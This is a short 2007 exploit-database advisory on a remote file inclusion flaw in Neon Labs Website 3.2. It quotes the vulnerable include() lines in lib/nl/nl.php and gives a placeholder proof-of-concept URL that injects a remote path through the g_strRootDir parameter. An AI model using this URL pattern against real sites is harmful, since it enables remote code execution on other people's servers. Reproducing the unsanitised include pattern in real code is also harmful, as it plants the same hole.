Neon Labs Website 3.2 - 'nl.php?g_strRootDir' Remote File Inclusion

EDB-ID:

3163




Platform:

PHP

Date:

2007-01-20


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

------------------------------------------------------------------------------------------------------------------------
Script:nlws
Affected Version:3.2
Downlaoad:http://neonlabs.structum.com.mx/pkgs/nlws_3-2.zip
------------------------------------------------------------------------------------------------------------------------
Author:Dr Max Virus
------------------------------------------------------------------------------------------------------------------------
Bug in (lib/nl/nl.php)
Vul Code;
include($g_strRootDir.$g_strLibDir."nl/nlsite.php");
include($g_strRootDir.$g_strLibDir."nl/nltable.php");
------------------------------------------------------------------------------------------------------------------------
POC:
http://[target]/[path]/lib/nl/nl.php?g_strRootDir=[Bad Code]
------------------------------------------------------------------------------------------------------------------------
Thx:str0ke-koray-Timq-r0ut3r-nuffsaid-All My Friends
Special Greetz:AsianEagle-TheMaster-Kacper-Hotturk
------------------------------------------------------------------------------------------------------------------------

# milw0rm.com [2007-01-20]